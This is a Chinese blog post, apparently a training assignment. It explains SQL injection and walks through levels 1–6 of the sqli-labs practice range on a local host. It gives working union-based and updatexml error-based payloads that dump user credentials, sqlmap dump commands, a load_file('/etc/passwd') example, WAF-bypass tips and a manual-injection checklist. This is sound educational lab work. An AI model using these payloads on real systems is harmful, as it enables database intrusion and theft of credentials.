实习实训day5

于 2024-09-01 18:34:12 发布
阅读量682 收藏 14
点赞数 10
文章标签: 数据库 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZXY10298/article/details/141787826
版权

目录

要求

1.总结SQL注入原理、SQL注入常用函数及含义,SQL注入防御手段,SQL注入常用绕过waf的方法
2.sqli-labs通关前5关,并写出解题步骤,必须手工过关,禁止使用sqlmap
3.总结SQLi的手工注入的步骤
4.使用sqlmap通过或验证第六关

SQL注入总结

原理

SQL注入是一种针对后台数据库的攻击手段,其原理在于攻击者通过精心构造的恶意SQL命令插入到Web表单的输入域或页面请求中,当服务器执行这些SQL命令时,可以实现对数据库的非法操作,如猜解、查询、删除、添加数据等。SQL注入的漏洞条件通常包括输入参数用户可控、参数被带入数据库查询且未经过滤或验证。

常用函数

  1. version():返回数据库的版本信息,可以利用此信息来查找针对特定版本的数据库漏洞。
SELECT version();
  1. user():返回当前数据库的用户名,可以利用此信息来尝试进行权限提升或找到相关用户的敏感信息。
SELECT user();
  1. database():返回当前数据库名,可以利用此信息来尝试访问或操作其他数据库。
SELECT database();
  1. concat():拼接字符串,将多个字符串值连接成一个字符串。可以利用此函数来构造特定的输出,以便更容易地读取或理解数据。
SELECT concat(username, ' ', password) FROM users WHERE id = 1; # 将username和password字段的值拼接成一个字符串,中间用空格分隔
  1. group_concat():将多个行的列值连接成一个字符,可以利用此函数来获取多个值,而不需要分别查询每一行。
SELECT group_concat(username) FROM users; # 将users表中所有行的username字段的值连接成一个字符串。
  1. sleep():使数据库查询暂停执行指定的时间,常用于时间盲注。可以利用此函数来测量查询的执行时间,从而推断出某些信息。
SELECT sleep(5);
  1. if():根据条件返回不同的值,可用于逻辑判断。
SELECT if(user() = 'root', 'admin', 'user') as privilege; # 如果当前数据库用户是root,则返回admin,否则返回user。
  1. updatexml():XML更新函数,当第二个参数XPath格式错误时会报错,同时将传入的参数进行输出。常用于报错注入。
SELECT updatexml(1, concat(0x7e, (SELECT user()), 0x7e), 1); # XPath表达式是错误的,会导致数据库报错。报错信息中会包含user()函数的结果,从而泄露数据库用户信息。
  1. extractvalue():XML提取值函数,与updatexml()类似,也用于报错注入。
SELECT extractvalue(1, concat(0x7e, (SELECT user()), 0x7e));
  1. load_file():读取文件内容,常用于读取服务器上的敏感文件。
SELECT load_file('/etc/passwd'); # 尝试读取服务器上的/etc/passwd文件。

防御手段

  • 对用户进行分级管理:严格控制用户的权限,禁止普通用户执行敏感操作。
  • 参数化查询:在编写SQL语句时,通过参数化查询来传递变量,避免直接将用户输入拼接到SQL语句中。
  • 输入验证:对用户输入的数据进行严格验证和过滤,特别是过滤掉单引号、双引号等特殊字符。
  • 使用安全参数:利用数据库提供的安全参数来确保输入的安全性。
  • 定期扫描和检测:使用专业的扫描工具定期检测系统中的SQL注入漏洞。
  • 多层验证:在客户端和服务器端都进行输入验证,确保输入数据的安全性。
  • 数据库信息加密:对敏感数据库信息进行加密存储,防止数据泄露。

绕过waf的方法

  • 注释符号绕过:使用SQL注释符号(如–、/**/、#)来隐藏恶意SQL代码,使其不会被WAF识别或过滤。
  • 编码绕过:通过URL编码、Unicode编码等方式来隐藏恶意SQL代码,绕过WAF的检测。
  • 大小写绕过:利用数据库系统对大小写不敏感的特性,将SQL关键字写成不同的大小写形式来绕过基于大小写的过滤器。
  • 特殊字符绕过:使用引号、逻辑运算符等特殊字符构造恶意SQL代码,绕过WAF的检测。
  • 逻辑漏洞绕过:利用应用程序或数据库的逻辑漏洞,结合盲注技术来绕过WAF的检测。

SQL注入靶场

项目源码:

https://github.com/Audi-1/sqli-labs

第一关

提示输入变量id:
image.png
令id=1:
image.png
令id=2-1:
image.png
查询结果与id=1不同,说明此处为字符型。
使用union注入:

id=2' union select 1; --+

image.png
提示列数不对,依次增加select后面的列数,直到成功查询:

id=2' union select 1,2,3; --+

image.png
说明这个表有3列。
但这里仅显示了查询出的第一条记录,说明后台代码可能限制了显示的记录数。
用limit语句查看其他记录:
image.png
可以看到成功显示出了union select的查询结果。
爆库名:

id=2' union select 1,database(),3 limit 1,1; --+

image.png
库名为security。
爆表名:

id=2' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' limit 1,1; --+

image.png
可以看到其中有个users表。
爆users表的列名:

id=2' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' limit 1,1; --+

image.png
可以看到users表的列为id,username和password。
爆user列和password列:

id=2' union select 1,group_concat(username),group_concat(password) from users limit 1,1; --+

image.png
可见成功得到了所有的用户名和密码。
看一下源码:
image.png
可见id变量直接被作为单引号字符串拼接到了sql语句里,并且使用了mysql_fetch_array()函数使得最终仅会展示查询到的第一条结果。

第二关

与第一关一样,测试一下id=1和id=2-1的查询结果:
image.png
image.png
结果一样,说明为数字型。
测试一下union注入:

id=1 union select 1,2,3 limit 1,1;--+

image.png
可见成功注入。
直接使用和上一关同样的方法:

id=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1; --+ # 爆表名,得到users
id=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database() limit 1,1; --+ # 爆列名,得到username和password
id=2 union select 1,group_concat(username),group_concat(password) from users limit 1,1; --+

image.png
看一下源码:
image.png
可见这一关id直接被拼接到了sql语句里。

第三关

测试id=2-1的结果与id=2的结果一致,说明为字符型:
image.png
尝试使用union注入:

id=2' union select 1,2,3 --+

image.png
根据报错信息,可以推断出输入的单引号成功闭合了原始查询语句中,id变量前面的那个单引号。但id变量后面的那个单引号之后还有一个反括号),说明这里的id变量还被括号包裹。
因此再加个反括号闭合原始查询语句中的括号:

id=1') union select 1,2,3; --+

image.png
之后使用和前面同样的union注入方式:

id=1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1; --+ # 爆表名,得到users
id=1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database() limit 1,1; --+ # 爆列名,得到username和password
id=1') union select 1,group_concat(username),group_concat(password) from users limit 1,1; --+

image.png
看一下源码:
image.png
可见id确实被单引号加括号包裹。

第四关

测试id=2-1的结果与id=2的结果一致,说明为字符型:
image.png
注入单引号,没有报错:
image.png
注入双引号,报错。并且报错信息中还有个反括号,说明这里的id变量同时被双引号和括号包裹:
image.png
之后使用和前面同样的union注入方式,闭合双引号和括号即可:

id=2") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1; --+ # 爆表名,得到users
id=2") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database() limit 1,1; --+ # 爆列名,得到username和password
id=2") union select 1,group_concat(username),group_concat(password) from users limit 1,1; --+

image.png
看一下源码:
image.png
可以看到id变量确实被双引号加括号包裹。

第五关

测试id=1:
image.png
加单引号,报错,说明id被单引号包裹:
image.png
之后经测试,发现查询成功的结果只会显示You are in…:
image.png
由于该题会提示报错信息,所以利用updatexml()函数,在其第二个参数处执行SQL语句,这样就会在报错信息中显示出查询结果(这里的0x7e为~的ASCII码,主要是为了在报错信息里区分出查询结果):

id=1' union select 1,updatexml(1, concat(0x7e, (SELECT database()), 0x7e), 1),3 limit 1,1;--+

image.png
之后同样在updatexml()的第二个参数处注入SQL语句即可:

id=1' union select 1,updatexml(1, concat(0x7e, (SELECT group_concat(table_name) from information_schema.tables where table_schema=database()), 0x7e), 1),3 limit 1,1;--+
id=1' union select 1,updatexml(1, concat(0x7e, (SELECT group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()), 0x7e), 1),3 limit 1,1;--+
id=1' union select 1,updatexml(1, concat(0x7e,(SELECT group_concat(username) from users), 0x7e), 1),3 limit 1,1;--+
id=1' union select 1,updatexml(1, concat(0x7e,(SELECT group_concat(password) from users), 0x7e), 1),3 limit 1,1;--+

爆表名:
image.png
爆列名:
image.png
爆用户名、密码:
image.png
image.png
这里由于updatexml()对输出的字符长度做了限制,导致最长只能显示32位。
看一下源码:
image.png
可以看到这题对id变量没有太多限制,而是不显示数据查询成功的结果。因此这题也可以用盲注的方法爆出信息。

第六关(Sqlmap)

先测试一下是否存在SQL注入点:

python sqlmap.py -u http://127.0.0.1:8081/sqli-labs/Less-6/?id=1

image.png
image.png
测试结果显示,id变量存在注入点,使用的是GET方法,注入方法可以是布尔盲注、报错注入或时间盲注。此外还测试出了我搭建靶场的本地Web环境的版本信息。
爆当前使用的数据库名(如果要爆所有库名就用--dbs):

python sqlmap.py -u http://127.0.0.1:8081/sqli-labs/Less-6/?id=1 --dbms=MySQL --current-dbs

image.png
image.png
爆表名:

python sqlmap.py -u http://127.0.0.1:8081/sqli-labs/Less-6/?id=1 --dbms=MySQL -D 'security' --tables

image.png
image.png
爆字段:

python sqlmap.py -u http://127.0.0.1:8081/sqli-labs/Less-6/?id=1 --dbms=MySQL -D 'security' -T 'users' --dump

image.png
image.png
爆出的数据同时也被存放在了csv文件中:
在这里插入图片描述

手工注入步骤总结

  1. 判断有无注入点

目标:确定应用程序的输入点是否存在SQL注入漏洞。
方法

  • 尝试在输入点插入单引号(')、双破折号(--)等特殊字符,并观察应用程序的响应。如果应用程序返回数据库错误消息或行为异常,则可能存在SQL注入漏洞。
  • 使用and 1=1and 1=2等逻辑判断语句,观察页面返回内容是否有变化。如果and 1=1导致页面正常显示,而and 1=2导致页面异常或返回不同的内容,则进一步确认存在SQL注入的可能性。
  1. 猜解列名数量

目标:确定数据库表中列的数量,以便后续构造正确的UNION SELECT语句。
方法

  • 在注入点后面添加ORDER BY 数字语句,逐渐增加数字的值,直到出现错误消息(如“未知的列”或“索引超出范围”等)。出现错误时,前一个数字通常就是表中的列数。
  1. 判断回显点
  • 目标:确定哪些位置可以回显查询结果,以便在后续步骤中显示数据库信息。
  • 方法
    • 使用UNION SELECT语句结合已知数量的列和自定义数据(如1,2,3,...),尝试在页面中不同位置显示这些数据。观察哪些位置能够显示自定义数据,这些位置就是可能的回显点。
    • 使用CONCAT()等函数将多个查询结果合并为一个字符串,并尝试在回显点显示。
  1. 信息收集
  • 目标:收集数据库的结构信息,包括数据库版本、当前数据库名、数据库中的表名及列名等。
  • 方法
    • 使用version()函数获取数据库版本信息。
    • 使用database()函数获取当前数据库名。
    • 查询information_schema数据库中的schematatablescolumns表,获取数据库、表和列的信息。使用GROUP_CONCAT()函数将多个结果合并为一个字符串,便于在单个查询中返回大量信息。
    • 使用@@global.version_compile_os等系统变量获取操作系统信息,进一步了解目标环境。
  1. 查找敏感数据
  • 目标:利用收集到的信息,构造SQL语句以访问或操作数据库中的敏感数据(如用户账号、密码等)。
  • 方法
    • 根据已知的表名和列名,直接查询敏感数据。例如,使用SELECT column_name FROM table_name WHERE condition语句获取特定条件下的数据。
    • 如果数据库支持文件读写或命令执行等高级功能,可以利用这些功能进行更高级的攻击。
ZXY10298
关注
  • 10
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
嵌入式实习-day5-线程
11-20
根据提供的实习日志内容,我们可以总结出以下几个关键知识点: ### 1. 线程的基本概念 - **定义**:线程是比进程更轻量级的执行单元,多个线程可以共享同一个进程的内存空间,这使得它们之间的通信更加高效。 - **...
Day10实习日记1
08-08
Spring MVC框架实践日记 通过阅读Day10实习日记1,我们可以了解到Spring MVC框架的基本概念...Day10实习日记1提供了Spring MVC框架的基本概念和实践操作,帮助我们了解到Spring MVC框架的使用技术和Java实训的重要性。
Day09实习日记1
08-08
Java 实训 Day09 实习日记1 今天是 2017 年 7 月 12 日星期三,晴天,地点在工科楼 A203,老师是张明星,单位是南京华信智源教育科技有限公司。本次实习日记主要记录了使用 Java 进行的 MVC 相关操作,并使用 ...
Day01实习日记1
08-08
在暑期 Java 实训的第一天,学员们开始了他们的编程之旅。实训内容围绕着 Java 的基础知识展开,旨在为学员们构建坚实的编程基础。首先,实训开始前,指导老师张明星讲解了实训的主要教学内容和考核标准,强调了实践...
Day07实习日记1
08-08
【Java暑期实训——Day07实习日记】 在2017年7月10日的这一天,我在南京华信智源教育科技有限公司的工科楼A203进行了Java实训的第七天。指导老师是张明星,我们主要进行了以下几个方面的学习和实践: 一、回顾与...
Redis基础命令和事务,redis持久化和主从复制
baomingshu的博客
08-31 1044
nosql数据库介绍:解释为 non-relational(非关系型数据库)。在NoSQL 数据库中数据之间是无联系的数据的结构是松散的,可变的。优势:大数据量,高性能,灵活的数据模型,高可用,低成本劣势:(1)无关系,数据之间是无联系的。
mysql-day02
m0_64370841的博客
08-29 1957
【代码】mysql-day02。
数据库管理-第236期 数据库一体机的价值(20240829)
yhw1809的博客
08-29 1393
数据库一体机是硬件、操作系统和数据库之间的融合,利用更少的硬件实现小体积的高性能密度。
编译原理简介
m0_52796585的博客
09-01 575
编译原理是计算机科学中的一个核心领域,它涉及到将高级编程语言编写的源代码转换成机器语言的过程。这个过程对于计算机程序的运行至关重要,因为计算机硬件只能理解机器语言指令。编译原理不仅关注编译器的设计和实现,还涉及语言的语义、语法分析、代码优化等多个方面。
(1)Hilt的基本概念和使用
challenge51all的专栏
08-27 1686
Jetpack Hilt 是一个强大的依赖注入框架,它简化了 Android 应用中的依赖管理,提高了代码的可维护性和可测试性。通过使用注解和模块,开发人员可以轻松地管理应用中的依赖关系,并在不同的组件之间共享和注入依赖。在应用的 Application 类上使用这个注解,告诉 Hilt 这是一个使用 Hilt 进行依赖注入的应用。Jetpack Hilt 是一个用于 Android 的依赖注入框架,它建立在 Dagger 的基础上,旨在简化 Android 应用中的依赖注入过程。
您应该使用哪个矢量数据库? 选择最适合您需求的数据库
weixin_41446370的博客
09-01 724
在现实世界中,并非所有数据都能整齐地排列成行和列。在处理复杂的非结构化数据(如图像、视频和自然语言)时尤其如此。矢量数据库是一种以高维矢量形式存储数据的数据库,本质上是代表对象特征或特性的数字列表。每个矢量对应一个独特的实体,如一段文本、图像或视频。但为什么要使用矢量呢?奥妙就在于它能够捕捉语义和相似性。通过将数据表示为向量,我们可以对它们进行数学比较,并确定它们的相似或不相似程度。这使我们能够执行复杂的查询,如 "为我查找与此相似的图片 "或 “检索与此文本语义相关的文档”。
MYSQL数据库初体验
qq_63994746的博客
08-28 1848
面向Windows操作系统简单、易用华为:欧拉阿里:龙蜥腾讯:tencentOS麒麟:(银河麒麟、中标麒麟 – >centos 优麒麟 – > Ubuntu )统信:uos红旗深度:deepin。
CAS单点登录说明文档
最新发布
大强博客
09-01 52
CAS单点登录说明文档
SpringBoot项目初始化搭建
weixin_63405049的博客
08-30 1133
本章主要讲解了SpringBoot项目初始化搭建,编程事务的使用,分页依赖的使用,以及跨域问题如何解决,解决了轻量级项目构建初期遇到的一些问题,提供于前后端交互时产生的问题进行分析与解决
ASP.NET Core 入门教学四 集成Redis
Life is not divided
08-28 390
ASP.NET Core 项目中集成了 Redis 缓存。现在,你可以利用 Redis 的高性能缓存功能来提升你的应用程序性能。
Oracle数据库
2401_85217463的博客
08-27 983
SQL语句通常用于完成一些数据库的操作任务,例如增加、修改、删除、查询数据以及对数据库对象(表、视图、索引、过程、函数、触发器等等)的一些列操作。巧妙运用SQL语句能够简化编程,起到事半功倍效果。程序员或者数据库管理员使用SQL语句能够完成下面的操作:创建用户、创建表空间、创建表删除用户、删除表空间、删除表drop userdrop table改变数据库系统环境设置用户授权grant为数据库的表建立索引修改数据库表结构通过alter table 关键字新建、删除、修改表个字段。
基于Spark的云南旅游大数据分析平台
qq_40309403的博客
08-28 758
Hi,大家好,今天分享的项目是《基于Spark的云南旅游大数据分析平台》
基于Java+Springboot+Vue+elememt宠物用品商城系统设计实现
央顺科技官方博客
08-31 1043
随着信息技术的不断发展,我们现在已经步入了信息化的时代了,而信息时代的代表便是网络技术的日渐成熟,而现在网络已经和我们的生活紧密的联系起来了,我们不敢想象没有网络我们的生活会像怎么样,也许就像食物中没有调料现在的生活离开了网络会变得索然无味。通过网络我们可以足不出户的做许多事情,例如工作、娱乐、学习,交友和购物等等许多我们数之不尽的事情,而就是因为网络我们的生活变得多姿多彩,或许有时甚至帮我们省下不少的时间和给予了我们更多的机遇。宠物网上商城对我们来说就有这些意义。
【系统架构设计师】论文:论高可靠性系统中软件容错技术的应用
数据知道的博客
08-28 1033
我所就职的国内某某知名互联网公司组织研发了一套分布式支付平台,该支付平台主要满足公司快速发展和各业务线业务流量日益增加的支付需求,用于支撑各业务线的支付功能,我有幸被定为该平台的架构设计师,主要负责架构设计工作。本文以该支付平台为例,**主要论述了软件容错技术和方法在该系统中的具体应用。**通过采用以集群化的形式进行应用部署;通过主备形式的数据库部署进行软件容错;通过程序设计方面进行软件的容错与避错。
c语言简单万年历实训报告
06-02
以下是一个简单的C语言万年历的实训报告,供您参考: 一、实训目的 本次实训的主要目的是通过编写一个简单的C语言万年历程序,巩固C语言基本语法和编程思想,提高编程能力和解决问题的能力。 二、实训要求 1、能够使用C语言基本语法和控制语句编写程序。 2、能够使用数组来存储和操作数据。 3、能够使用函数来实现模块化编程。 4、能够使用指针来操作内存中的数据。 5、能够使用文件来读取和写入数据。 三、实训内容 1、程序功能 本程序实现了一个简单的万年历功能,可以通过输入年份和月份来显示该月的日历。 2、程序实现 以下是本程序的主要代码实现: ```c #include <stdio.h> // 判断是否为闰年 int is_leap_year(int year) { if ((year % 4 == 0 && year % 100 != 0) || year % 400 == 0) { return 1; } else { return 0; } } // 获取某个月份的总天数 int get_days(int year, int month) { int days[] = {31, 28 + is_leap_year(year), 31, 30, 31, 30, 31, 31, 30, 31, 30, 31}; return days[month - 1]; } // 获取某个日期是星期几 int get_weekday(int year, int month, int day) { if (month == 1 || month == 2) { year--; month += 12; } int c = year / 100; int y = year % 100; int w = y + y / 4 + c / 4 - 2 * c + 26 * (month + 1) / 10 + day - 1; w = (w % 7 + 7) % 7; return w; } // 显示日历 void show_calendar(int year, int month) { int days = get_days(year, month); int weekday = get_weekday(year, month, 1); printf(" 日 一 二 三 四 五 六\n"); int i; for (i = 0; i < weekday; i++) { printf(" "); } for (i = 1; i <= days; i++) { printf("%2d ", i); if ((weekday + i) % 7 == 0) { printf("\n"); } } if ((weekday + days) % 7 != 0) { printf("\n"); } } int main() { int year, month; printf("请输入年份:"); scanf("%d", &year); printf("请输入月份:"); scanf("%d", &month); if (month < 1 || month > 12) { printf("月份输入错误!\n"); return 1; } printf(" %d年%d月\n", year, month); show_calendar(year, month); return 0; } ``` 四、实训总结 通过本次实训,我学会了如何使用C语言来编写一个简单的万年历程序,巩固了C语言基本语法和编程思想,加强了对函数、数组、指针、文件等概念和用法的理解,提高了编程能力和解决问题的能力。同时,我也意识到在编程过程中需要注重代码的规范、可读性和可维护性,这对于日后的开发工作非常重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值